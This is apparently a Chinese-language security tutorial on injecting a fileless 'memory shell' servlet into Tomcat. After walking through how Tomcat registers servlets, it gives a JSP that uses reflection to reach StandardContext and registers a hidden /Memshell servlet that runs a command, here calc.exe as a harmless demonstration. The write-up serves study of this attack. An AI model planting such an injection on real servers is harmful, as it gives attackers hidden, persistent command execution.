servlet内存马

参考视频:java内存马专题1-servlet内存马

创建javaweb项目,勾选servlet

我们可以将idea给的注释写法,改到web.xml里面

xml 复制代码
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>HelloWorld</servlet-name>
        <servlet-class>com.example.tomcatdemo.HelloServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>HelloWorld</servlet-name>
        <url-pattern>/hello-servlet</url-pattern>
    </servlet-mapping>

</web-app>

记得加依赖(版本改自己tomcat版本)

xml 复制代码
<dependency>
    <groupId>org.apache.tomcat.</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>9.0.91</version> <!-- Latest version as of writing -->
</dependency>

流程分析

我们的目标就是自己写一个Servlet并且注册进Tomcat

首先拿这个demo看下注册过程,注册是在ContextConfig#configureContext中,在下面位置打断点,第三次时开始加载HelloServlet。

创建一个wrapper,很明显我们在自己写注册流程时还要反射获取context

之后看看注册servlet都进行了哪些操作,我们要手动实现这些操作。

setName(类名)

setServletClass(全类名)

把wrapper放入context

将/hello-servletURL映射到HelloWorld Servlet

注册就看完了,但是发现没有实例化的部分。要手动new一个类(下面攻击实现会涉及)。

攻击实现

payload

写个马并将它注册进Tomcat,马好写。主要是如何手动注册Tomcat。

首先要获取standardContext,用request.getServletContext()可获取到,根据下图写反射。

jsp 复制代码
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.PrintWriter" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.Wrapper" %><%--
  Created by IntelliJ IDEA.
  User: DELL
  Date: 2024/8/5
  Time: 15:50
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<body>
<%!
    public class addServlet extends HttpServlet {
        private String message;

        public void init() {
            message = "Hello World!";
        }

        public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
            Runtime.getRuntime().exec("calc.exe");

        }

        public void destroy() {
        }
    }

%>

<%
    //反射获取StandardContext
    ServletContext servletContext = request.getServletContext();

    Field applicationContext = servletContext.getClass().getDeclaredField("context");
    applicationContext.setAccessible(true);
    ApplicationContext applicationContext1 = (ApplicationContext) applicationContext.get(servletContext);

    Field standardContext = applicationContext1.getClass().getDeclaredField("context");
    standardContext.setAccessible(true);
    StandardContext standardContext1 = (StandardContext) standardContext.get(applicationContext1);

    //模拟注册
    Wrapper wrapper = standardContext1.createWrapper();
    wrapper.setName("addServlet");
    wrapper.setServletClass("addServlet.class.getName()");
    //实例化
    wrapper.setServlet(new addServlet());
    standardContext1.addChild(wrapper);
    standardContext1.addServletMappingDecoded("/Memshell","addServlet");
%>
</body>
</html>

流程

首先访问jsp的路径/addServlet.jsp,通过反射将addServlet注册进Tomcat。

之后访问映射/Memshell,用addServlet处理请求,弹计算器。

相关推荐
编程、小哥哥1 天前
在 Docker 中部署 Jenkins,并完成项目的构建和发布
servlet·docker·jenkins
weixin_537590452 天前
《Java编程入门官方教程》第八章练习答案
java·开发语言·servlet
Ttang234 天前
Tomcat原理(4)——尝试手动Servlet的实现
java·开发语言·servlet·java-ee·tomcat·intellij-idea
loop lee4 天前
计算机网络 - HTTP 协议和万维网
java·网络协议·servlet·tomcat
不修×蝙蝠4 天前
搭建Tomcat(四)---Servlet容器
java·服务器·servlet·tomcat·搭建resquest
像污秽一样5 天前
简易记事本开发-(SSM+Vue)
java·vue.js·spring boot·spring·servlet·maven·mybatis
计算机学无涯6 天前
Servlet学习中遇到的一些问题及解决
servlet
测试工程师成长之路6 天前
解锁 Jenkins 搭建全攻略
运维·servlet·jenkins
进击的编程浪人6 天前
jsp中的四个域对象(Spring MVC)
servlet
怒放de生命20107 天前
jenkins 出现 Jenkins: 403 No valid crumb was included in the request
java·servlet·jenkins